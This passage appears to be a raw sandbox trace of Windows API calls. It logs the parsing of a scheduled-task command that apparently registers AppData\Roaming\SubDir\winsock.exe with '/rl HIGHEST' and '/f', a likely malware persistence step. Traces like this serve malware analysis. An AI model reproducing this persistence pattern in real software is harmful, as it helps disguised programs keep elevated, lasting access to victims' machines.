wMatch=0x6f) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x62) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0189.237] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0189.237] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0189.237] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0189.238] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0189.238] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0189.238] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0189.238] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0189.238] StrChrW (lpStart=" \x09", wMatch=0x6b) returned 0x0 [0189.238] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0189.238] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0189.238] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0189.238] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0189.239] GetLastError () returned 0x0 [0189.239] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.239] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.239] RtlRestoreLastWin32Error () returned 0x0 [0189.239] RtlRestoreLastWin32Error () returned 0x0 [0189.239] lstrlenW (lpString="/rl") returned 3 [0189.239] lstrlenW (lpString="-/") returned 2 [0189.239] StrChrIW (lpStart="-/", wMatch=0x471002f) returned="/" [0189.239] lstrlenW (lpString="create") returned 6 [0189.239] lstrlenW (lpString="create") returned 6 [0189.239] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.239] lstrlenW (lpString="rl") returned 2 [0189.239] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.239] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0189.239] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.239] lstrlenW (lpString="|create|") returned 8 [0189.239] lstrlenW (lpString="|rl|") returned 4 [0189.239] StrStrIW (lpFirst="|create|", lpSrch="|rl|") returned 0x0 [0189.239] RtlRestoreLastWin32Error () returned 0x490 [0189.240] lstrlenW (lpString="?") returned 1 [0189.240] lstrlenW (lpString="?") returned 1 [0189.240] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.240] lstrlenW (lpString="rl") returned 2 [0189.240] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.240] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0189.240] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.240] lstrlenW (lpString="|?|") returned 3 [0189.240] lstrlenW (lpString="|rl|") returned 4 [0189.240] RtlRestoreLastWin32Error () returned 0x490 [0189.240] lstrlenW (lpString="s") returned 1 [0189.240] lstrlenW (lpString="s") returned 1 [0189.240] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.240] lstrlenW (lpString="rl") returned 2 [0189.240] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.240] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0189.240] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.240] lstrlenW (lpString="|s|") returned 3 [0189.241] lstrlenW (lpString="|rl|") returned 4 [0189.241] RtlRestoreLastWin32Error () returned 0x490 [0189.241] lstrlenW (lpString="u") returned 1 [0189.241] lstrlenW (lpString="u") returned 1 [0189.241] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.241] lstrlenW (lpString="rl") returned 2 [0189.241] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.241] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0189.241] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.241] lstrlenW (lpString="|u|") returned 3 [0189.241] lstrlenW (lpString="|rl|") returned 4 [0189.241] RtlRestoreLastWin32Error () returned 0x490 [0189.241] lstrlenW (lpString="p") returned 1 [0189.241] lstrlenW (lpString="p") returned 1 [0189.241] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.241] lstrlenW (lpString="rl") returned 2 [0189.241] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.241] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0189.242] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.242] lstrlenW (lpString="|p|") returned 3 [0189.242] lstrlenW (lpString="|rl|") returned 4 [0189.242] RtlRestoreLastWin32Error () returned 0x490 [0189.242] lstrlenW (lpString="ru") returned 2 [0189.242] lstrlenW (lpString="ru") returned 2 [0189.242] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.242] lstrlenW (lpString="rl") returned 2 [0189.242] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.242] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0189.242] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.242] lstrlenW (lpString="|ru|") returned 4 [0189.242] lstrlenW (lpString="|rl|") returned 4 [0189.242] StrStrIW (lpFirst="|ru|", lpSrch="|rl|") returned 0x0 [0189.243] RtlRestoreLastWin32Error () returned 0x490 [0189.243] lstrlenW (lpString="rp") returned 2 [0189.243] lstrlenW (lpString="rp") returned 2 [0189.243] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.243] lstrlenW (lpString="rl") returned 2 [0189.243] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.243] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0189.243] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.243] lstrlenW (lpString="|rp|") returned 4 [0189.243] lstrlenW (lpString="|rl|") returned 4 [0189.243] StrStrIW (lpFirst="|rp|", lpSrch="|rl|") returned 0x0 [0189.243] RtlRestoreLastWin32Error () returned 0x490 [0189.243] lstrlenW (lpString="sc") returned 2 [0189.243] lstrlenW (lpString="sc") returned 2 [0189.243] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.243] lstrlenW (lpString="rl") returned 2 [0189.243] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.243] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0189.244] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.244] lstrlenW (lpString="|sc|") returned 4 [0189.244] lstrlenW (lpString="|rl|") returned 4 [0189.244] StrStrIW (lpFirst="|sc|", lpSrch="|rl|") returned 0x0 [0189.244] RtlRestoreLastWin32Error () returned 0x490 [0189.244] lstrlenW (lpString="mo") returned 2 [0189.244] lstrlenW (lpString="mo") returned 2 [0189.244] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.244] lstrlenW (lpString="rl") returned 2 [0189.244] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.244] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0189.244] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.244] lstrlenW (lpString="|mo|") returned 4 [0189.244] lstrlenW (lpString="|rl|") returned 4 [0189.244] StrStrIW (lpFirst="|mo|", lpSrch="|rl|") returned 0x0 [0189.244] RtlRestoreLastWin32Error () returned 0x490 [0189.244] lstrlenW (lpString="d") returned 1 [0189.245] lstrlenW (lpString="d") returned 1 [0189.245] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.245] lstrlenW (lpString="rl") returned 2 [0189.245] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.245] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3 [0189.245] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.245] lstrlenW (lpString="|d|") returned 3 [0189.245] lstrlenW (lpString="|rl|") returned 4 [0189.245] RtlRestoreLastWin32Error () returned 0x490 [0189.245] lstrlenW (lpString="m") returned 1 [0189.245] lstrlenW (lpString="m") returned 1 [0189.245] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.245] lstrlenW (lpString="rl") returned 2 [0189.245] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.245] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3 [0189.245] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.245] lstrlenW (lpString="|m|") returned 3 [0189.245] lstrlenW (lpString="|rl|") returned 4 [0189.246] RtlRestoreLastWin32Error () returned 0x490 [0189.246] lstrlenW (lpString="i") returned 1 [0189.246] lstrlenW (lpString="i") returned 1 [0189.246] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.246] lstrlenW (lpString="rl") returned 2 [0189.246] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.246] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3 [0189.246] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.246] lstrlenW (lpString="|i|") returned 3 [0189.246] lstrlenW (lpString="|rl|") returned 4 [0189.246] RtlRestoreLastWin32Error () returned 0x490 [0189.246] lstrlenW (lpString="tn") returned 2 [0189.246] lstrlenW (lpString="tn") returned 2 [0189.246] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.246] lstrlenW (lpString="rl") returned 2 [0189.246] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.247] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.247] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.247] lstrlenW (lpString="|tn|") returned 4 [0189.247] lstrlenW (lpString="|rl|") returned 4 [0189.247] StrStrIW (lpFirst="|tn|", lpSrch="|rl|") returned 0x0 [0189.247] RtlRestoreLastWin32Error () returned 0x490 [0189.247] lstrlenW (lpString="tr") returned 2 [0189.247] lstrlenW (lpString="tr") returned 2 [0189.247] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.247] lstrlenW (lpString="rl") returned 2 [0189.247] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.247] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.247] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.247] lstrlenW (lpString="|tr|") returned 4 [0189.247] lstrlenW (lpString="|rl|") returned 4 [0189.247] StrStrIW (lpFirst="|tr|", lpSrch="|rl|") returned 0x0 [0189.247] RtlRestoreLastWin32Error () returned 0x490 [0189.248] lstrlenW (lpString="st") returned 2 [0189.248] lstrlenW (lpString="st") returned 2 [0189.248] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.248] lstrlenW (lpString="rl") returned 2 [0189.248] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.248] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|st|") returned 4 [0189.248] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.248] lstrlenW (lpString="|st|") returned 4 [0189.248] lstrlenW (lpString="|rl|") returned 4 [0189.248] StrStrIW (lpFirst="|st|", lpSrch="|rl|") returned 0x0 [0189.248] RtlRestoreLastWin32Error () returned 0x490 [0189.248] lstrlenW (lpString="sd") returned 2 [0189.248] lstrlenW (lpString="sd") returned 2 [0189.248] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.248] lstrlenW (lpString="rl") returned 2 [0189.248] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.249] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sd|") returned 4 [0189.249] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.249] lstrlenW (lpString="|sd|") returned 4 [0189.249] lstrlenW (lpString="|rl|") returned 4 [0189.249] StrStrIW (lpFirst="|sd|", lpSrch="|rl|") returned 0x0 [0189.249] RtlRestoreLastWin32Error () returned 0x490 [0189.249] lstrlenW (lpString="ed") returned 2 [0189.249] lstrlenW (lpString="ed") returned 2 [0189.249] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.249] lstrlenW (lpString="rl") returned 2 [0189.249] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.249] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ed|") returned 4 [0189.249] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.249] lstrlenW (lpString="|ed|") returned 4 [0189.249] lstrlenW (lpString="|rl|") returned 4 [0189.249] StrStrIW (lpFirst="|ed|", lpSrch="|rl|") returned 0x0 [0189.249] RtlRestoreLastWin32Error () returned 0x490 [0189.249] lstrlenW (lpString="it") returned 2 [0189.249] lstrlenW (lpString="it") returned 2 [0189.249] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.250] lstrlenW (lpString="rl") returned 2 [0189.250] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.250] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|it|") returned 4 [0189.250] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.250] lstrlenW (lpString="|it|") returned 4 [0189.250] lstrlenW (lpString="|rl|") returned 4 [0189.250] StrStrIW (lpFirst="|it|", lpSrch="|rl|") returned 0x0 [0189.250] RtlRestoreLastWin32Error () returned 0x490 [0189.250] lstrlenW (lpString="et") returned 2 [0189.250] lstrlenW (lpString="et") returned 2 [0189.250] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.250] lstrlenW (lpString="rl") returned 2 [0189.250] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.250] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|et|") returned 4 [0189.250] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.250] lstrlenW (lpString="|et|") returned 4 [0189.250] lstrlenW (lpString="|rl|") returned 4 [0189.250] StrStrIW (lpFirst="|et|", lpSrch="|rl|") returned 0x0 [0189.250] RtlRestoreLastWin32Error () returned 0x490 [0189.250] lstrlenW (lpString="k") returned 1 [0189.250] lstrlenW (lpString="k") returned 1 [0189.250] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.250] lstrlenW (lpString="rl") returned 2 [0189.250] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.250] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|k|") returned 3 [0189.250] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.251] lstrlenW (lpString="|k|") returned 3 [0189.251] lstrlenW (lpString="|rl|") returned 4 [0189.251] RtlRestoreLastWin32Error () returned 0x490 [0189.251] lstrlenW (lpString="du") returned 2 [0189.251] lstrlenW (lpString="du") returned 2 [0189.251] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.251] lstrlenW (lpString="rl") returned 2 [0189.251] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.251] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|du|") returned 4 [0189.251] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.251] lstrlenW (lpString="|du|") returned 4 [0189.251] lstrlenW (lpString="|rl|") returned 4 [0189.251] StrStrIW (lpFirst="|du|", lpSrch="|rl|") returned 0x0 [0189.251] RtlRestoreLastWin32Error () returned 0x490 [0189.251] lstrlenW (lpString="ri") returned 2 [0189.251] lstrlenW (lpString="ri") returned 2 [0189.251] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.251] lstrlenW (lpString="rl") returned 2 [0189.252] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.252] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ri|") returned 4 [0189.252] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.252] lstrlenW (lpString="|ri|") returned 4 [0189.252] lstrlenW (lpString="|rl|") returned 4 [0189.252] StrStrIW (lpFirst="|ri|", lpSrch="|rl|") returned 0x0 [0189.252] RtlRestoreLastWin32Error () returned 0x490 [0189.252] lstrlenW (lpString="z") returned 1 [0189.252] lstrlenW (lpString="z") returned 1 [0189.252] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.252] lstrlenW (lpString="rl") returned 2 [0189.252] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.252] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|z|") returned 3 [0189.252] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.252] lstrlenW (lpString="|z|") returned 3 [0189.252] lstrlenW (lpString="|rl|") returned 4 [0189.252] RtlRestoreLastWin32Error () returned 0x490 [0189.252] lstrlenW (lpString="f") returned 1 [0189.252] lstrlenW (lpString="f") returned 1 [0189.252] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.252] lstrlenW (lpString="rl") returned 2 [0189.253] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.253] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.253] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.253] lstrlenW (lpString="|f|") returned 3 [0189.253] lstrlenW (lpString="|rl|") returned 4 [0189.253] RtlRestoreLastWin32Error () returned 0x490 [0189.253] lstrlenW (lpString="v1") returned 2 [0189.253] lstrlenW (lpString="v1") returned 2 [0189.253] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.253] lstrlenW (lpString="rl") returned 2 [0189.253] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.253] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|v1|") returned 4 [0189.253] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.253] lstrlenW (lpString="|v1|") returned 4 [0189.253] lstrlenW (lpString="|rl|") returned 4 [0189.253] StrStrIW (lpFirst="|v1|", lpSrch="|rl|") returned 0x0 [0189.253] RtlRestoreLastWin32Error () returned 0x490 [0189.253] lstrlenW (lpString="xml") returned 3 [0189.253] lstrlenW (lpString="xml") returned 3 [0189.253] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.253] lstrlenW (lpString="rl") returned 2 [0189.253] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.254] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|xml|") returned 5 [0189.254] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.254] lstrlenW (lpString="|xml|") returned 5 [0189.254] lstrlenW (lpString="|rl|") returned 4 [0189.254] StrStrIW (lpFirst="|xml|", lpSrch="|rl|") returned 0x0 [0189.254] RtlRestoreLastWin32Error () returned 0x490 [0189.254] lstrlenW (lpString="ec") returned 2 [0189.254] lstrlenW (lpString="ec") returned 2 [0189.254] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.254] lstrlenW (lpString="rl") returned 2 [0189.254] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.254] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ec|") returned 4 [0189.254] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.254] lstrlenW (lpString="|ec|") returned 4 [0189.254] lstrlenW (lpString="|rl|") returned 4 [0189.254] StrStrIW (lpFirst="|ec|", lpSrch="|rl|") returned 0x0 [0189.255] RtlRestoreLastWin32Error () returned 0x490 [0189.255] lstrlenW (lpString="rl") returned 2 [0189.255] lstrlenW (lpString="rl") returned 2 [0189.255] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.255] lstrlenW (lpString="rl") returned 2 [0189.255] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.255] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.255] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rl|") returned 4 [0189.255] lstrlenW (lpString="|rl|") returned 4 [0189.255] lstrlenW (lpString="|rl|") returned 4 [0189.255] StrStrIW (lpFirst="|rl|", lpSrch="|rl|") returned="|rl|" [0189.255] RtlRestoreLastWin32Error () returned 0x0 [0189.255] RtlRestoreLastWin32Error () returned 0x0 [0189.255] lstrlenW (lpString="HIGHEST") returned 7 [0189.255] lstrlenW (lpString="-/") returned 2 [0189.255] StrChrIW (lpStart="-/", wMatch=0x4710048) returned 0x0 [0189.255] RtlRestoreLastWin32Error () returned 0x490 [0189.255] RtlRestoreLastWin32Error () returned 0x490 [0189.255] RtlRestoreLastWin32Error () returned 0x0 [0189.255] lstrlenW (lpString="HIGHEST") returned 7 [0189.255] StrChrIW (lpStart="HIGHEST", wMatch=0x3a) returned 0x0 [0189.255] RtlRestoreLastWin32Error () returned 0x490 [0189.256] RtlRestoreLastWin32Error () returned 0x0 [0189.256] _memicmp (_Buf1=0x478ab28, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.256] lstrlenW (lpString="HIGHEST") returned 7 [0189.256] lstrlenW (lpString="HIGHEST") returned 7 [0189.256] lstrlenW (lpString=" \x09") returned 2 [0189.256] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0189.256] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0189.256] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0189.256] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0189.256] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0189.256] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0189.256] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0189.256] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0189.256] GetLastError () returned 0x0 [0189.256] lstrlenW (lpString="HIGHEST") returned 7 [0189.256] lstrlenW (lpString="HIGHEST") returned 7 [0189.256] RtlRestoreLastWin32Error () returned 0x0 [0189.256] RtlRestoreLastWin32Error () returned 0x0 [0189.256] lstrlenW (lpString="/f") returned 2 [0189.256] lstrlenW (lpString="-/") returned 2 [0189.256] StrChrIW (lpStart="-/", wMatch=0x471002f) returned="/" [0189.256] lstrlenW (lpString="create") returned 6 [0189.256] lstrlenW (lpString="create") returned 6 [0189.256] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.257] lstrlenW (lpString="f") returned 1 [0189.257] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.257] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0189.257] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.257] lstrlenW 